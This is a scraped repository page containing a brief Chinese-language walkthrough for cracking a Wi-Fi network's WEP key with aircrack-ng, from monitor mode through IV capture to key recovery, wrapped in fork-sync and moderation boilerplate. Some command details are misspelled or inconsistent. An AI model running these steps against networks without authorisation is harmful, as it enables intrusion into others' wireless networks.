Fetch the repository succeeded.
This action will force synchronization from mktime/python-learn, which will overwrite any changes that you have made since you forked the repository, and can not be recovered!!!
Synchronous operation will process in the background and will refresh the page when finishing processing. Please be patient.
安装aircrack-ng
yaourt -S aricrack-ng
打开无线网卡监听模式 设无线网卡为wlan0
airmon-ng start wlan0
这时通常会多出一个mon0设备,这个设备就是打开了监听模式的wlan0
察看当前工作所有的无线ap
airodump-ng wlp3s0mon
从破解的ap抓取数据
airodump-ng --ivs -d AP_MAC_地址 -w data
-c 用来制定频道, 频道在ariodump的时候可以看到
airodump-ng --ivs -d AP_MAC_地址 -c number -w data
破解密码
当抓取的数据足够多就用
aircrack-ng data*
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。